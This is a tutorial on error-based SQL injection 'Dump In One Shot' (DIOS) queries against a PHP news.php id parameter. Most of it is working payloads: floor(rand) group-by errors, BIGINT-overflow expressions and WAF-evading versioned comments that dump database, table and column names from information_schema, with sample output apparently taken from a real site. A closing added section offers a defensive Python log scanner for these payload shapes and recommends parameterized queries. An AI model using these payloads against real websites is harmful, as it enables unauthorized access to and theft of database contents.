In this tutorial you will learn how to build an error-based Dump In One Shot (DIOS) query.
As we know, in an error-based query we send our commands to the server and it returns the result inside an error message.
If we want to get the version(), we send a query like this.
http://www.FakeSite.com/news.php?id=11 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1-- -
We get the version printed on the page: version=5.5.42-cll
Now let's get the primary database name.
http://www.FakeSite.com/news.php?id=11 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
And here is our primary database.
The primary database name is "kkbaketo_wordpress". If we want to get the others, we usually increase LIMIT 0,1 to LIMIT 1,1.
But we can also get all databases without using LIMIT.
Here is our syntax for getting all databases.
(SELECT!x-~0.FROM(SELECT(concat(0x3a3a3a,(select group_concat(schema_name) from information_schema.schemata)))x)a)
Now add this syntax to get all databases.
http://www.FakeSite.com/news.php?id=(SELECT!x-~0.FROM(SELECT(concat(0x3a3a3a,(select group_concat(schema_name) from information_schema.schemata)))x)a)-- -
And these are our databases.
information_schema,kkbaketo_wordpress
The next step is to get the tables.
Here is the example.
http://www.FakeSite.com/news.php?id=11 or 1 group by concat_ws(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)) having min(0) or 1-- -
And we get the table name in the error response:
We just got one table name: kkbaketop_category
It was our first table name. We can get the next one, and then another, by increasing the value of LIMIT 0,1 to LIMIT 2,1, LIMIT 3,1.
We increase the LIMIT for tables.
LIMIT 0,1 for the 1st table.
LIMIT 1,1 for the 2nd table.
As we know, we can dump all tables and columns in UNION-based injection.
In error-based Dump In One Shot (DIOS) we cannot dump all tables/columns as in UNION-based injection.
But we can get some tables/columns from the database by building our query.
Here is our syntax for tables.
(select group_concat(table_name) from information_schema.tables where table_schema=database())
Now add this syntax to our DIOS query.
(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat(table_name) from information_schema.tables where table_schema=database())))x)a)
Our DIOS query is ready for tables.
http://www.FakeSite.com/news.php?id=(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat(table_name) from information_schema.tables where table_schema=database())))x)a)-- -
kkbaketop_admin,kkbaketop_category,kkbaketop_content,kkbaketop_contentOld,kkbaketop_meta,kkbaketop_navigation,kkbaketop_product
We can also use an HTML tag to show each table on a new line.
HTML tag = <BR>
We can use it by encoding it as a hex value or by putting a single quote before and after the HTML tag.
Hex value = 3c42523e. We have to put 0x before the hex value to use the HTML tag.
Hex value = 0x3c42523e
With single quotes = '<BR>'
Put the HTML tag before the table_name.
Now let's add this tag to our error-based DIOS query and execute it.
http://www.FakeSite.com/news.php?id=(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat('<BR>',table_name) from information_schema.tables where table_schema=database())))x)a)-- -
Now all tables are on a new line.
The next step is to get the columns.
Here is the syntax for columns.
(select group_concat(0x3c42523e,table_name,0x3a,column_name) from information_schema.columns where table_schema=database())
Add this syntax to the DIOS query and execute it to get the columns from each table.
And here is the final DIOS query for getting tables and columns in one shot with error-based injection.
http://www.FakeSite.com/news.php?id=(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat('<BR>',table_name,0x3a,column_name) from information_schema.columns where table_schema=database())))x)a)-- -
You can see the tables and columns printed in the screenshot.
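From the defender's side, every request in this tutorial puts something other than an integer into the numeric id parameter. The following added example (not part of the original tutorial) scans access-log lines for that condition and labels which of the payload shapes shown above are present; the log lines, the log format, and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Labels for payload shapes that appear in this tutorial (matched after normalizing).
INDICATORS = {
    "rand_group_by": re.compile(r"floor\(rand\(0\)\*2\)"),
    "bigint_overflow": re.compile(r"!\w+-~0"),
    "schema_enum": re.compile(r"information_schema\.(schemata|tables|columns)"),
    "group_concat": re.compile(r"group_concat\("),
    "versioned_comment": re.compile(r"/\*!\d{5}"),
}
INT_ONLY = re.compile(r"\d{1,10}")
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/')

def inspect_target(target, numeric_params=("id",)):
    """Return [(param, [labels])] for numeric parameters carrying non-integer values."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name not in numeric_params or INT_ONLY.fullmatch(value):
            continue
        flat = re.sub(r"\s+", "", value.lower())  # ignore case and spacing variations
        hits = [label for label, rx in INDICATORS.items() if rx.search(flat)]
        findings.append((name, hits or ["non_integer"]))
    return findings

def scan_log(lines):
    """Return [(line_number, param, labels)] for every flagged request."""
    out = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if m:
            out += [(n, p, h) for p, h in inspect_target(m.group(1))]
    return out

# Constructed sample lines; 203.0.113.0/24 is a documentation address range.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /news.php?id=11 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /news.php?id=11%20or%201%20group%20by%20concat_ws(0x3a,version(),floor(rand(0)*2))%20having%20min(0)%20or%201--%20- HTTP/1.1" 200 812',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /news.php?id=(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())))x)a)--%20- HTTP/1.1" 200 944',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The integer check is what flags a request; the labels only aid triage. The underlying fix remains binding id as an integer parameter in the query rather than concatenating it into the SQL string.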
Hope you like the tutorial.